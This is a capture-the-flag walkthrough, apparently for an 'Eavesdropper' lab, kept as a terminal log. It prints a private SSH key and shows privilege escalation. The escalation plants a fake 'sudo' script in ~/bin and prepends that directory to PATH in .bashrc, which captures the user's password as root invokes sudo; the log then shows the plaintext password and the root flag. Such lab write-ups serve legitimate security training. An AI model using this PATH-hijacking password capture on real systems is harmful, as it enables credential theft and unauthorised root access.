Eavesdropper

Last updated 2 years ago

Was this helpful?

┌──(witty㉿kali)-[~/Downloads] └─$ cat idrsa.id-rsa -----BEGIN OPENSSH PRIVATE KEY----- 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 F5iAvxBl12p5cAAAAKam9obkBhbGllbgE= -----END OPENSSH PRIVATE KEY----- ┌──(witty㉿kali)-[~/Downloads] └─$ chmod 600 idrsa.id-rsa ┌──(witty㉿kali)-[~/Downloads] └─$ ssh -i idrsa.id-rsa frank@10.10.85.42 Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the 'unminimize' command. Last login: Thu Mar 2 16:49:31 2023 from 172.18.0.3 frank@workstation:~$ whoami frank frank@workstation:~$ find / -perm -4000 2>/dev/null | xargs ls -lah -rwsr-xr-x 1 root root 84K Jul 14 2021 /usr/bin/chfn -rwsr-xr-x 1 root root 52K Jul 14 2021 /usr/bin/chsh -rwsr-xr-x 1 root root 87K Jul 14 2021 /usr/bin/gpasswd -rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount -rwsr-xr-x 1 root root 44K Jul 14 2021 /usr/bin/newgrp -rwsr-xr-x 1 root root 67K Jul 14 2021 /usr/bin/passwd -rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su -rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo -rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount -rwsr-xr-- 1 root messagebus 51K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 463K Dec 2 2021 /usr/lib/openssh/ssh-keysign frank@workstation:~$ sudo -l [sudo] password for frank: Sorry, try again. [sudo] password for frank: Sorry, try again. [sudo] password for frank: sudo: 3 incorrect password attempts ┌──(witty㉿kali)-[~/Downloads] └─$ python3 -m http.server 7070 Serving HTTP on 0.0.0.0 port 7070 (http://0.0.0.0:7070/) ... 10.10.85.42 - - [02/Mar/2023 11:55:27] "GET /pspy64 HTTP/1.1" 200 - frank@workstation:/tmp$ wget http://10.8.19.103:7070/pspy64 --2023-03-02 16:55:27-- http://10.8.19.103:7070/pspy64 Connecting to 10.8.19.103:7070... connected. HTTP request sent, awaiting response... 200 OK Length: 3104768 (3.0M) [application/octet-stream] Saving to: ‘pspy64’ pspy64 100%[============================>] 2.96M 812KB/s in 3.7s 2023-03-02 16:55:32 (812 KB/s) - ‘pspy64’ saved [3104768/3104768] frank@workstation:/tmp$ chmod +x pspy64 frank@workstation:/tmp$ ./pspy64 pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d ██▓███ ██████ ██▓███ ▓██ ██▓ ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒ ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░ ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░ ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░ ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ ░░ ░ ░ ░ ░░ ▒ ▒ ░░ ░ ░ ░ ░ ░ Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive) Draining file system events due to startup... done 2023/03/02 16:56:19 CMD: UID=1000 PID=1790 | ./pspy64 2023/03/02 16:56:19 CMD: UID=1000 PID=1011 | -bash 2023/03/02 16:56:19 CMD: UID=1000 PID=1010 | sshd: frank@pts/0 2023/03/02 16:56:19 CMD: UID=0 PID=996 | sshd: frank [priv] 2023/03/02 16:56:19 CMD: UID=0 PID=1 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 2023/03/02 16:56:34 CMD: UID=0 PID=1797 | sshd: [accepted] 2023/03/02 16:56:34 CMD: UID=0 PID=1798 | sshd: [accepted] 2023/03/02 16:56:34 CMD: UID=0 PID=1799 | sshd: frank [priv] 2023/03/02 16:56:34 CMD: UID=0 PID=1800 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 2023/03/02 16:56:34 CMD: UID=0 PID=1801 | run-parts --lsbsysinit /etc/update-motd.d 2023/03/02 16:56:34 CMD: UID=0 PID=1802 | /bin/sh /etc/update-motd.d/00-header 2023/03/02 16:56:34 CMD: UID=0 PID=1803 | /bin/sh /etc/update-motd.d/00-header 2023/03/02 16:56:34 CMD: UID=0 PID=1804 | /bin/sh /etc/update-motd.d/00-header 2023/03/02 16:56:34 CMD: UID=0 PID=1805 | run-parts --lsbsysinit /etc/update-motd.d 2023/03/02 16:56:34 CMD: UID=0 PID=1806 | run-parts --lsbsysinit /etc/update-motd.d 2023/03/02 16:56:34 CMD: UID=0 PID=1807 | run-parts --lsbsysinit /etc/update-motd.d 2023/03/02 16:56:34 CMD: UID=0 PID=1808 | sshd: frank [priv] 2023/03/02 16:56:34 CMD: UID=1000 PID=1809 | sshd: frank@pts/1 2023/03/02 16:56:35 CMD: UID=1000 PID=1810 | sshd: frank@pts/1 2023/03/02 16:56:36 CMD: UID=1000 PID=1811 | sshd: frank@pts/1 2023/03/02 16:56:37 CMD: UID=1000 PID=1812 | sshd: frank@pts/1 2023/03/02 16:56:37 CMD: UID=1000 PID=1813 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1814 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1815 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1816 | /bin/sh /etc/init.d/dbus status 2023/03/02 16:56:37 CMD: UID=1000 PID=1818 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1817 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1819 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1820 | /bin/sh /etc/init.d/hwclock.sh status 2023/03/02 16:56:37 CMD: UID=1000 PID=1822 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1821 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1823 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1824 | /bin/sh /etc/init.d/procps status 2023/03/02 16:56:37 CMD: UID=1000 PID=1825 | /bin/sh /etc/init.d/procps status 2023/03/02 16:56:37 CMD: UID=1000 PID=1826 | /bin/sh /etc/init.d/procps status 2023/03/02 16:56:37 CMD: UID=1000 PID=1827 | /bin/sh /etc/init.d/procps status 2023/03/02 16:56:37 CMD: UID=1000 PID=1829 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1828 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1830 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1833 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:56:37 CMD: UID=1000 PID=1832 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:56:37 CMD: UID=1000 PID=1831 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:56:37 CMD: UID=1000 PID=1834 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:56:37 CMD: UID=1000 PID=1835 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:56:37 CMD: UID=1000 PID=1836 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:56:37 CMD: UID=1000 PID=1838 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:37 CMD: UID=1000 PID=1837 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:56:38 CMD: UID=1000 PID=1839 | sshd: frank@pts/1 2023/03/02 16:56:39 CMD: UID=1000 PID=1840 | sshd: frank@pts/1 2023/03/02 16:56:39 CMD: UID=0 PID=1841 | sudo cat /etc/shadow 2023/03/02 16:56:59 CMD: UID=0 PID=1842 | sshd: [accepted] 2023/03/02 16:56:59 CMD: UID=0 PID=1843 | sshd: [accepted] 2023/03/02 16:56:59 CMD: UID=0 PID=1844 | sshd: frank [priv] 2023/03/02 16:56:59 CMD: UID=0 PID=1845 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 2023/03/02 16:56:59 CMD: UID=0 PID=1846 | run-parts --lsbsysinit /etc/update-motd.d 2023/03/02 16:56:59 CMD: UID=0 PID=1847 | /bin/sh /etc/update-motd.d/00-header 2023/03/02 16:56:59 CMD: UID=0 PID=1848 | /bin/sh /etc/update-motd.d/00-header 2023/03/02 16:56:59 CMD: UID=0 PID=1849 | /bin/sh /etc/update-motd.d/00-header 2023/03/02 16:56:59 CMD: UID=0 PID=1850 | run-parts --lsbsysinit /etc/update-motd.d 2023/03/02 16:56:59 CMD: UID=0 PID=1851 | run-parts --lsbsysinit /etc/update-motd.d 2023/03/02 16:56:59 CMD: UID=0 PID=1852 | run-parts --lsbsysinit /etc/update-motd.d 2023/03/02 16:56:59 CMD: UID=0 PID=1853 | sshd: frank [priv] 2023/03/02 16:56:59 CMD: UID=1000 PID=1854 | sshd: frank@pts/1 2023/03/02 16:57:00 CMD: UID=1000 PID=1855 | sshd: frank@pts/1 2023/03/02 16:57:01 CMD: UID=1000 PID=1856 | sshd: frank@pts/1 2023/03/02 16:57:02 CMD: UID=1000 PID=1857 | sshd: frank@pts/1 2023/03/02 16:57:02 CMD: UID=1000 PID=1858 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1859 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1860 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1861 | /bin/sh /etc/init.d/dbus status 2023/03/02 16:57:02 CMD: UID=1000 PID=1863 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1862 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1864 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1865 | /bin/sh /etc/init.d/hwclock.sh status 2023/03/02 16:57:02 CMD: UID=1000 PID=1867 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1866 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1868 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1869 | /bin/sh /etc/init.d/procps status 2023/03/02 16:57:02 CMD: UID=1000 PID=1870 | /bin/sh /etc/init.d/procps status 2023/03/02 16:57:02 CMD: UID=1000 PID=1871 | /bin/sh /etc/init.d/procps status 2023/03/02 16:57:02 CMD: UID=1000 PID=1872 | /bin/sh /etc/init.d/procps status 2023/03/02 16:57:02 CMD: UID=1000 PID=1874 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1873 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1875 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1878 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:57:02 CMD: UID=1000 PID=1877 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:57:02 CMD: UID=1000 PID=1876 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:57:02 CMD: UID=1000 PID=1879 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:57:02 CMD: UID=1000 PID=1880 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:57:02 CMD: UID=1000 PID=1881 | /bin/sh /etc/init.d/ssh status 2023/03/02 16:57:02 CMD: UID=1000 PID=1883 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:02 CMD: UID=1000 PID=1882 | /bin/sh /usr/sbin/service --status-all 2023/03/02 16:57:03 CMD: UID=1000 PID=1884 | sshd: frank@pts/1 2023/03/02 16:57:04 CMD: UID=1000 PID=1885 | sshd: frank@pts/1 2023/03/02 16:57:05 CMD: UID=0 PID=1886 | sudo cat /etc/shadow frank@workstation:/tmp$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.7 12172 7224 ? Ss 16:40 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups root 996 0.0 0.9 13576 9032 ? Ss 16:49 0:00 sshd: frank [priv] frank 1010 0.2 0.7 15264 7656 ? S 16:49 0:02 sshd: frank@pts/0 frank 1011 0.0 0.3 5992 3896 pts/0 Ss 16:49 0:00 -bash frank 2657 0.0 0.3 7644 3232 pts/0 R+ 17:04 0:00 ps aux frank@workstation:/tmp$ netstat -tulpn (No info could be read for "-p": geteuid()=1000 but you should be root.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.11:34385 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::22 :::* LISTEN - udp 0 0 127.0.0.11:48841 0.0.0.0:* - frank@workstation:/tmp$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin frank@workstation:/tmp$ cat /etc/hosts 127.0.0.1 localhost ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 172.18.0.2 workstation frank@workstation:/tmp$ tcpdump -A -i eth1 -w /tmp/tcpdump.pcap -bash: tcpdump: command not found frank@workstation:/tmp$ ethercap -bash: ethercap: command not found frank@workstation:~$ pwd /home/frank frank@workstation:~$ ls -lah total 32K drwxr-xr-x 1 frank frank 4.0K Mar 14 2022 . drwxr-xr-x 1 root root 4.0K Mar 14 2022 .. lrwxrwxrwx 1 frank frank 9 Mar 14 2022 .bash_history -> /dev/null -rw-r--r-- 1 frank frank 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 frank frank 3.7K Feb 25 2020 .bashrc drwx------ 2 frank frank 4.0K Mar 14 2022 .cache -rw-r--r-- 1 frank frank 807 Feb 25 2020 .profile drwxr-xr-x 1 frank frank 4.0K Mar 14 2022 .ssh -rw-r--r-- 1 frank frank 0 Mar 14 2022 .sudo_as_admin_successful frank@workstation:~$ head .bashrc # ~/.bashrc: executed by bash(1) for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples # If not running interactively, don't do anything case $- in *i*) ;; *) return;; esac `bashrc` stands for "Bourne-Again SHell Run Commands", and it is a shell script that is run by Bash, the default shell for most Linux distributions and macOS. The `bashrc` file contains a set of commands that are executed every time a new Bash shell is started. The `bashrc` file is typically located in the user's home directory (`~/.bashrc`) and can be edited using a text editor such as `nano` or `vim`. The file can be used to customize the behavior of the Bash shell, including setting environment variables, defining aliases, and creating functions. Some common examples of customizations that can be made in the `bashrc` file include setting the default prompt, adding directories to the system path, and defining shortcuts for frequently used commands. It's important to note that changes made to the `bashrc` file only take effect in new Bash shells that are started after the changes have been made. If you want to apply the changes immediately, you can either log out and log back in, or run the command `source ~/.bashrc` to reload the `bashrc` file in the current shell. you can change the PATH environment variable in the `bashrc` file to add directories to the system path. The PATH environment variable is a list of directories separated by colons (`:`), and it tells the shell where to look for executable files when a command is entered. By default, the PATH variable includes system directories such as `/usr/bin` and `/usr/local/bin`, but you can add additional directories to the PATH by modifying the `bashrc` file. In the command `export PATH=/home/frank/bin:$PATH`, the `/home/frank/bin` directory is added to the beginning of the `PATH` variable. This means that when you enter a command, the shell will first search for an executable file in `/home/frank/bin`, and if it doesn't find the file there, it will continue searching in the directories listed in the rest of the `PATH` variable. In the command `export PATH=$PATH:/home/frank/bin`, the `/home/frank/bin` directory is added to the end of the `PATH` variable. This means that the shell will search for an executable file in all of the directories listed in the `PATH` variable first, and if it doesn't find the file in any of those directories, it will then search in `/home/frank/bin`. So, depending on the situation, one command may be more appropriate than the other. If you want to give priority to executables in a specific directory, you should use the first command. If you want to add a new directory to the existing `PATH` variable, you should use the second command. so let's choose the first placing a false 'sudo' file to be executed frank@workstation:~$ /bin/sudo -l [sudo] password for frank: Sorry, try again. [sudo] password for frank: Sorry, try again. [sudo] password for frank: sudo: 3 incorrect password attempts Creating a "bin" directory is a common convention in Unix-like systems, and it is often used to store executable files and scripts that can be run from the command line. By convention, the directories `/bin`, `/usr/bin`, and `/usr/local/bin` are reserved for system executables, while the directory `~/bin` (i.e., a "bin" directory in the user's home directory) is often used for user-specific executables and scripts. frank@workstation:~$ mkdir ./bin frank@workstation:~$ ls -lah total 36K drwxr-xr-x 1 frank frank 4.0K Mar 2 18:45 . drwxr-xr-x 1 root root 4.0K Mar 14 2022 .. lrwxrwxrwx 1 frank frank 9 Mar 14 2022 .bash_history -> /dev/null -rw-r--r-- 1 frank frank 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 frank frank 3.7K Feb 25 2020 .bashrc drwx------ 2 frank frank 4.0K Mar 14 2022 .cache -rw-r--r-- 1 frank frank 807 Feb 25 2020 .profile drwxr-xr-x 1 frank frank 4.0K Mar 14 2022 .ssh -rw-r--r-- 1 frank frank 0 Mar 14 2022 .sudo_as_admin_successful drwxrwxr-x 2 frank frank 4.0K Mar 2 18:45 bin frank@workstation:~$ ls bin The `mkdir ./bin` command creates a new directory called "bin" in the current directory. frank@workstation:~/bin$ nano sudo frank@workstation:~/bin$ chmod +x sudo frank@workstation:~/bin$ cat sudo #!/bin/bash read password echo $password >> /home/frank/password_L.txt frank@workstation:~/bin$ cd .. frank@workstation:~$ nano .bashrc frank@workstation:~$ head .bashrc # ~/.bashrc: executed by bash(1) for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples export PATH=/home/frank/bin:$PATH # If not running interactively, don't do anything case $- in *i*) ;; *) return;; frank@workstation:~$ chmod +x ./bin/sudo frank@workstation:~$ ls bin password_L.txt frank@workstation:~$ cat password_L.txt !@#frankisawesome2022%* !@#frankisawesome2022%* !@#frankisawesome2022%* !@#frankisawesome2022%* !@#frankisawesome2022%* !@#frankisawesome2022%* frank@workstation:~$ sudo -l [sudo] password for frank: !@#frankisawesome2022%* Matching Defaults entries for frank on workstation: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User frank may run the following commands on workstation: (ALL : ALL) ALL frank@workstation:~$ sudo -s root@workstation:/home/frank# cd /root root@workstation:~# ls flag.txt root@workstation:~# cat flag.txt flag{14370304172628f784d8e8962d54a600} root@workstation:~# ls -lah total 20K drwx------ 1 root root 4.0K Mar 14 2022 . drwxr-xr-x 1 root root 4.0K Mar 14 2022 .. -rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc -rw-r--r-- 1 root root 161 Dec 5 2019 .profile -rw-r--r-- 1 root root 39 Mar 14 2022 flag.txt root@workstation:~# cat .profile # ~/.profile: executed by Bourne-compatible login shells. if [ "$BASH" ]; then if [ -f ~/.bashrc ]; then . ~/.bashrc fi fi mesg n 2> /dev/null || true root@workstation:~# head .bashrc # ~/.bashrc: executed by bash(1) for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples # If not running interactively, don't do anything [ -z "$PS1" ] && return # don't put duplicate lines in the history. See bash(1) for more options # ... or force ignoredups and ignorespace HISTCONTROL=ignoredups:ignorespace root@workstation:~# ls -lah / total 68K drwxr-xr-x 1 root root 4.0K Mar 14 2022 . drwxr-xr-x 1 root root 4.0K Mar 14 2022 .. -rwxr-xr-x 1 root root 0 Mar 14 2022 .dockerenv lrwxrwxrwx 1 root root 7 Mar 2 2022 bin -> usr/bin drwxr-xr-x 2 root root 4.0K Apr 15 2020 boot drwxr-xr-x 5 root root 340 Mar 2 16:40 dev drwxr-xr-x 1 root root 4.0K Mar 14 2022 etc drwxr-xr-x 1 root root 4.0K Mar 14 2022 home lrwxrwxrwx 1 root root 7 Mar 2 2022 lib -> usr/lib lrwxrwxrwx 1 root root 9 Mar 2 2022 lib32 -> usr/lib32 lrwxrwxrwx 1 root root 9 Mar 2 2022 lib64 -> usr/lib64 lrwxrwxrwx 1 root root 10 Mar 2 2022 libx32 -> usr/libx32 drwxr-xr-x 2 root root 4.0K Mar 2 2022 media drwxr-xr-x 2 root root 4.0K Mar 2 2022 mnt drwxr-xr-x 2 root root 4.0K Mar 2 2022 opt dr-xr-xr-x 156 root root 0 Mar 2 16:40 proc drwx------ 1 root root 4.0K Mar 14 2022 root drwxr-xr-x 1 root root 4.0K Mar 2 18:55 run lrwxrwxrwx 1 root root 8 Mar 2 2022 sbin -> usr/sbin drwxr-xr-x 2 root root 4.0K Mar 2 2022 srv dr-xr-xr-x 13 root root 0 Mar 2 16:40 sys drwxrwxrwt 1 root root 4.0K Mar 2 16:55 tmp drwxr-xr-x 1 root root 4.0K Mar 2 2022 usr drwxr-xr-x 1 root root 4.0K Mar 2 2022 var We were in a container I knew it

Eavesdropper

Eavesdropper

Download Keys

Find the Flag

Download Keys

Find the Flag